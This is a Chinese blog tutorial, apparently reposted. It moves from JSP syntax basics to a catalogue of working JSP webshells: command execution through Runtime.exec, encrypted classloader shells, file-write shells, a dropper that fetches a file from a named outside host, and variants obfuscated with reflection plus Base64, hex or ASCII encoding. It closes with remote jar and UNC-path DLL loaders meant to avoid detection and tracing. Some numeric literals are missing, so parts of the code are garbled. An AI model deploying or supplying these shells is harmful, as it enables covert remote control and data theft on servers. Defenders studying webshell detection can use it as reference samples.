Deformity JSP Webshell、Webshell Hidden Learning

1. JSP基础语法

0x1: 脚本程序

脚本程序可以包含任意量的Java语句、变量、方法或表达式,只要它们在脚本语言中是有效的

脚本程序的语法格式:
<% 代码片段 %> 或者可以编写与其等价的XML语句
<jsp:scriptlet>
代码片段
</jsp:scriptlet>

任何文本、HTML标签、JSP元素必须写在脚本程序的外面

<html>
<head><title>Hello World</title></head>
<body>
Hello World!<br/>
<%
out.println("Your IP address is " + request.getRemoteAddr());
%>
</body>
</html>

0x2: JSP声明

一个声明语句可以声明一个或多个变量、方法,供后面的Java代码使用。在JSP文件中,您必须先声明这些变量和方法然后才能使用它们
JSP声明的语法格式

<%! declaration; [ declaration; ]+ ... %>

或者也可以编写与其等价的XML语句
<jsp:declaration>
代码片段
</jsp:declaration>

程序示例

<%! int i = ; %>
<%! int a, b, c; %>
<%! Circle a = new Circle(2.0); %>

0x3: JSP表达式

. 一个JSP表达式中包含的脚本语言表达式,先被转化成String,然后插入到表达式出现的地方
. 由于表达式的值会被转化成String,所以您可以在一个文本行中使用表达式而不用去管它是否是HTML标签
. 表达式元素中可以包含任何符合Java语言规范的表达式,但是不能使用分号来结束表达式

JSP表达式的语法格式

<%= 表达式 %>

同样也可以编写与之等价的XML语句
<jsp:expression>
表达式
</jsp:expression>

程序示例

<html>
<head><title>A Comment Test</title></head>
<body>
<p>
Today's date: <%= (new java.util.Date()).toLocaleString()%>
</p>
</body>
</html>

0x4: JSP注释

JSP注释主要有两个作用: 为代码作注释、以及将某段代码注释掉

1. HTML注释

<!-- comment [ <%= expression %> ] -->

示例

<!-- This file displays the user login screen -->
在客户端的HTML源代码中产生和上面一样的数据:
<!-- This file displays the user login screen --> <!-- This page was loaded on <%= (new java.util.Date()).toLocaleString() %> -->

2. 隐藏注释

写在JSP程序中,但不是发给客户

<%-- 这里可以填写 JSP 注释 --%>

JSP编译器是不会对<%-- ... --%>之间的语句进行编译的,它不会显示在客户的浏览器中,也不会在源代码中看到在<%-- --%>之间的代码,你可以任意写注释语句,但是不能使用"--%>",如果你非要使用请用"--%\>"

<html>
<head><title>A Comment Test</title></head>
<body>
<h2>A Test of Comments</h2>
<%-- 该部分注释在网页中不会被显示--%>
</body>
</html>

0x5: JSP指令

JSP指令用来设置与整个JSP页面相关的属性
JSP指令语法格式

<%@ directive attribute="value" %>
这里有三种指令标签
. <%@ page ... %>: 定义页面的依赖属性,比如脚本语言、error页面、缓存需求等等
. <%@ include ... %>: 包含其他文件
<%@ taglib ... %>: 引入标签库的定义,可以是自定义标签

0x6: JSP行为

JSP行为标签使用XML语法结构来控制servlet引擎。它能够动态插入一个文件,重用JavaBean组件,引导用户去另一个页面,为Java插件产生相关的HTML等等
行为标签只有一种语法格式,它严格遵守XML标准

<jsp:action_name attribute="value" />

0x7: JSP隐含对象

JSP支持九个自动定义的变量,称为隐含对象

. request: HttpServletRequest类的实例
. response: HttpServletResponse类的实例
. out: PrintWriter类的实例,用于把结果输出至网页上
. session: HttpSession类的实例
. application: ServletContext类的实例,与应用上下文有关
. config: ServletConfig类的实例
. pageContext: PageContext类的实例,提供对JSP页面所有对象以及命名空间的访问
. page: 类似于Java类中的this关键字
. Exception: Exception类的对象,代表发生错误的JSP页面中对应的异常对象

0x8: JSP常量

JSP语言定义了以下几个常量

. Boolean: true and false
. Integer: 与Java中的一样
. Floating point: 与Java中的一样
. String: 以单引号或双引号开始和结束。" 被转义成 \",'被转义成 \', \ 被转义成\\
. Null: null

Relevant Link:

http://www.runoob.com/jsp/jsp-syntax.html
http://vod.sjtu.edu.cn/help/Article_Show.asp?ArticleID=1448

2. Java动态特性

Java语言动态性一直以来都比较差,并不像PHP那样灵活。在Java中的动态性往往需要使用一些曲折的方式来实现.这里简单列举了Java十余种动态性相关技术并总结部分技术实现安全问题。

  • Java反射机制
  • MethodHandle
  • JDK动态代理
  • 使用JVM上的动态语言,如
    • Groovy
    • JRuby
    • Jython
  • 表达式库,如
    • OGNL
    • MVEL
    • SpEL
    • EL
  • JSP、JSPX、Quercus(Resin容器提供了PHP5支持)
  • 字节码库,如
    • Asm
    • Javassist
    • Cglib
    • BCEL
  • ScriptEngineManager(脚本引擎)
  • 动态编译,如
    • JDT
    • JavaCompiler
  • ClassLoader、URLClassLoader
  • 模版引擎,如
    • Freemarker
    • Velocity
  • 序列化、反序列化(包含Java 对象序列化、XML、JSON等)
  • JNI、JNA(Java调用C/C++)
  • OSGi(Open Service Gateway Initiative)
  • RMI(Java远程方法调用,基于对象序列化机制实现)
  • WebService
  • JDWP(Java Platform Debugger Architecture Java调试协议)
  • JMX(Java Management Extensions)

0x1:Java反射机制特性

Java反射机制可以无视类方法、变量访问权限修饰符,可以调用任何类的任意方法、访问并修改成员变量值。也就是说只要发现一处Java反射调用漏洞几乎就可以为实现任何目的。当然前提可能需要你能控制反射的类名、方法名和参数。

一行代码即可实现反射调用Runtime执行本地命令:

Runtime.class.getMethod("exec", String.class).invoke(Runtime.class.getMethod("getRuntime").invoke(null), "whoami")

Relevant Link:

https://www.freebuf.com/articles/web/194836.html

3. WEBSHELL变形方式

0x0:普通一句话

1、session传参

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}
public Class g(byte []b){return super.defineClass(b,,b.length);}}%>
<%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring();session.putValue("u",k);
out.print(k);return;}
Cipher c=Cipher.getInstance("AES");
SecretKeySpec sec=new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES");
c.init(,sec);
String uploadString= request.getReader().readLine();
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(uploadString))).newInstance().equals(pageContext);%>

Relevant Link:

https://www.ddosi.com/b237/
https://github.com/tdifg/WebShell/blob/master/Jsp/pwnshell%20-%20an%20interactive%20jsp%20shell.jsp
https://github.com/ysrc/webshell-sample/blob/master/jsp/b11440638084ab162d5759d23f881ea0fc13a28b.jsp

2、response相关

String cs = request.getParameter("z0") + "";
request.setCharacterEncoding(cs);
response.setContentType("text/html;charset=" + cs);
String Z = EC(request.getParameter(Pwd) + "", cs);
String z1 = EC(request.getParameter("z1") + "", cs);
String z2 = EC(request.getParameter("z2") + "", cs);
StringBuffer sb = new StringBuffer("");
try
{
sb.append("->" + "|");
if (Z.equals("A"))
{
String s = new File(application.getRealPath(request.getRequestURI())).getParent();
sb.append(s + "\t");
if (!s.substring(, ).equals("/"))
{
AA(sb);
}
}
}

3、HttpURLConnection

<%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.getRealPath("/")+request.getParameter("f");new File(t).getParentFile().mkdirs();if(request.getParameter("p")==null){DataInputStream i=new DataInputStream(((HttpURLConnection)(new URL("http://qztmi.cn/js/h.txt").openConnection())).getInputStream());DataOutputStream o=new DataOutputStream(new FileOutputStream(t));byte[] b=new byte[];int c=;while((c=i.read(b))>){o.write(b,,c);}o.close();i.close();out.println("down-ok");response.setHeader("down-ok","");}else{(new FileOutputStream(t)).write(request.getParameter("p").getBytes());out.println("upload-ok");}%> 

4、借助http header传参

<%Runtime.getRuntime().exec(request.getHeader("c"));%>.

0x1:利用JSP中的字符串混淆方式

1. ASCII

String a=new String(new byte[] { , , , , , ,  });
System.out.println("ASCII: "+a);

2. HEX

import javax.xml.bind.DatatypeConverter;
String b= new String(DatatypeConverter.parseHexBinary("797a64644d7236"));
System.out.println("HEX: "+b);

3. BASE64

import sun.misc.BASE64Decoder;
String c = new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNg=="));
System.out.println("BASE64: "+c);

0x2: 写文件木马

1. 把字符串编码后写入指定文件

<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234 写入web目录: <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234 2: <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234 写入web目录: <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

2. 下载远程文件

<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -; while ((a = in.read(b)) != -) { baos.write(b, , a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
请求:http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png 下载到web路径:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -; while ((a = in.read(b)) != -) { baos.write(b, , a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
请求:http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png

Relevant Link:

http://www.2cto.com/Article/201503/378649.html
http://www.blogjava.net/lusm/archive/2007/02/21/100295.html
http://dingody.iteye.com/blog/2003882
http://blog.kukafei520.net/html/2010/444.html
http://www.125135.com/491711.html
http://www.125135.com/317079.htm
http://www.125135.com/317770.htm
http://p2j.cn/?p=1627

0x3:普通进程启动一句话

1. 无回显

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

2. 有回显带密码验证

JAVA执行系统命令的核心就是Runtime.getRuntime().exec(cmd)

<% if("".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -; byte[] b = new byte[]; out.print("<pre>");
while((a=in.read(b))!=-){
out.println(new String(b,,a));
}
out.print("</pre>");
}
%>

0x4:通过类反射机制实现进程启动一句话

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
Object[]{}), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -;
byte[] b = new byte[];
out.print("<pre>");
while((a=in.read(b))!=-){
out.println(new String(b));
}
out.print("</pre>");
}
%>

0x5:反射机制+编码实现进程启动一句话

1. 利用ASCII编码

<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%
if(request.getParameter("cmd")!=null){
Class rt = Class.forName(new String(new byte[] { , , , , , , , , , , , , , , , , }));
Process e = (Process) rt.getMethod(new String(new byte[] { , , , }), String.class).invoke(rt.getMethod(new String(new byte[] { , , , , , , , , , })).invoke(null), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -;byte[] b = new byte[];out.print("<pre>");
while((a=in.read(b))!=-){ out.println(new String(b)); }out.print("</pre>");
}
%>

2. 利用HEX编码

<%@ page contentType="text/html;charset=UTF-8" import="javax.xml.bind.DatatypeConverter" language="java" %>
<%
if(request.getParameter("cmd")!=null){
Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary("6a6176612e6c616e672e52756e74696d65")));
Process e = (Process) rt.getMethod(new String(DatatypeConverter.parseHexBinary("")), String.class).invoke(rt.getMethod(new String(DatatypeConverter.parseHexBinary("67657452756e74696d65"))).invoke(null), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -;byte[] b = new byte[];out.print("<pre>");
while((a=in.read(b))!=-){ out.println(new String(b)); }out.print("</pre>");
}
%>

java中与执行命令相关的主要有两个类:

java.lang.Runtime
java.lang.ProcessBuilder

我们上文中反射了Runtime类,那么同样我们也可以反射ProcessBuilder类,原理类似。

0x6:通过反射加载shellcode代码

类反射可以把我们想要调用的函数或者类的名字,通过一个字符串来进行传递。此时也就相当于我们实现了php中的变量函数,就可以利用base64编码或者hex编码等来混淆关键函数。Java的类反射机制是jsp shell具备动态对抗特性的一个重要原因。

使用反射调用对象方法的步骤如下:

Class clz = Class.forName("test.Apple"); // 获取类的 Class 对象实例
Constructor appleConstructor = clz.getConstructor(); // 根据 Class 对象实例获取 Constructor 对象
Object appleObj = appleConstructor.newInstance();// 使用 Constructor 对象的 newInstance 方法获取反射类对象
Method setPriceMethod = clz.getMethod("setPrice", int.class); // 获取方法的 Method 对象
setPriceMethod.invoke(appleObj, ); // 利用 invoke 方法调用方法

如果没有构造函数的情况下会更简单一些:

Class clz = Class.forName("test.Apple"); // 获取类的 Class 对象实例
Object appleObj=clz.newInstance();// 直接获得clz类的一个实例化对象
Method setPriceMethod = clz.getMethod("setPrice", int.class); // 获取方法的 Method 对象
setPriceMethod.invoke(appleObj, ); // 利用 invoke 方法调用方法

可以压缩一下写成一行的形式

Class.forName("test.Apple").getMethod("setPrice", int.class).invoke(Class.forName("test.Apple").newInstance(),);

上面的类反射加载只能加载本地的.class文件,这本质上只相当于php中的“include localfile.php”的作用。

要想实现类似php中的任意eval shellcode的目的,就需要我们能向反射类加载器传递任意的classcode,这也就是冰蝎可以做到动态解析二进制class字节码的原理。

我们通过一个小例子来说明:

首先写一个命令执行的类,调一个calc,但是我们不写主函数,也就是说我们先不让他运行。

package test;
import java.io.IOException;
public class calc {
@Override
public String toString() {
try {
Runtime.getRuntime().exec("calc.exe");
} catch (IOException e) {
e.printStackTrace();
}
return "OK";
}
}

在项目里生成之后,在out目录下可以看到编译好的二进制class文件。

Deformity JSP Webshell、Webshell Hidden Learning

然后把它base64,保存下来,

Deformity JSP Webshell、Webshell Hidden Learning

接着生成一个loader类,用于加载我们的class文件,

package test;
import sun.misc.BASE64Decoder;
public class loader {
public static class Myloader extends ClassLoader //继承ClassLoader
{
public Class get(byte[] b)
{
return super.defineClass(b, , b.length);
}
}
public static void main(String[] args) throws Exception {
String classStr="xxxxxxxxxxxxxxxxx"; // class的base64编码
BASE64Decoder code=new sun.misc.BASE64Decoder();
Class result=new Myloader().get(code.decodeBuffer(classStr));//将base64解码成byte数组,并传入t类的get函数
System.out.println(result.newInstance().toString());
}
}

运行后成功调用计算器。

Deformity JSP Webshell、Webshell Hidden Learning

将代码中硬编码的class string改为从外部参数传入,就成为了jsp eval一句话木马了。

<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[].invoke(null, new Object[]{request.getParameterMap()})%> 

通过远程加载的方式,把远程的jar文件进行加载 (有害代码里都放jar里),本质上和php里的include原理类似。

远程部署的jar里放会被查杀的shell代码,比如菜刀的一句话客户端(.java)文件,然后把该java 文件编译成jar包即可。

Deformity JSP Webshell、Webshell Hidden Learning

Deformity JSP Webshell、Webshell Hidden Learning

Deformity JSP Webshell、Webshell Hidden Learning

Relevant Link:

https://mp.weixin.qq.com/s?__biz=MzI1MDIzMDAwMA==&mid=2247483974&idx=1&sn=5e692b451dc0681689ffc896dc368c4a&scene=21#wechat_redirect

0x7:利用jni远程调用载入dll,实现payload和loader分离

在java中,Java无法直接访问到操作系统底层如硬件系统,为此Java提供了JNI(Java Native Interface )来实现对于底层的访问。

JNI允许Java代码使用以其他语言编写的代码和代码库,本地程序中的函数也可以调用Java层的函数,即JNI实现了Java和本地代码间的双向交互。

Deformity JSP Webshell、Webshell Hidden Learning

java中可以使用native关键字来说明这个方法是原生函数,也就是这个方法是用C/C++语言实现的,并且被编译成了DLL,由java去调用。

可以将native方法比作Java程序同C程序的接口,其实现步骤:

1. 在Java中声明native()方法,然后编译;
2. 用javah命令产生一个.h文件;
3. 写一个.cpp文件实现native导出方法,其中需要包含第二步产生的.h文件(注意其中又包含了JDK带的jni.h文件);
4. 将第三步的.cpp文件编译成动态链接库文件;
5. 在Java中用System.loadLibrary()或者System.load()方法加载第四步产生的动态链接库文件,这个native()方法就可以在Java中被访问了。

最后jsp webshell如下:

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!
class JniClass {
public native String exec(String string);
public JniClass() {
//System.load("/Users/nano/IdeaProjects/untitled1/target/classes/libJniClass.jnilib");
//System.load("C:\\Program Files\\Apache Software Foundation\\Tomcat 8.5\\webapps\\shellbypass\\1.dll");
System.load("\\\\vmware-host\\Shared Folders\\test\\1.dll");
}
}
;
%>
<%
String cmd = request.getParameter("cmd");
JniClass jniClass = new JniClass();
String res = jniClass.exec(cmd);
%>
<%=res%>

jsp load时有两种思路,一种是将该jsp文件和该dll放置于服务器的本地路径。jsp的代码里指定dll的绝对路径\相对路径;另外一种是使用unc路径,这样恶意dll通过远程部署,加强隐蔽程度,加大溯源难度、提高部署灵活度。

Relevant Link:

https://mp.weixin.qq.com/s/RCXrCHJl4w4CTeLk_HPzQA
上一篇:小程序支持打开APP


下一篇:Deformity ASP/ASPX Webshell、Webshell Hidden Learning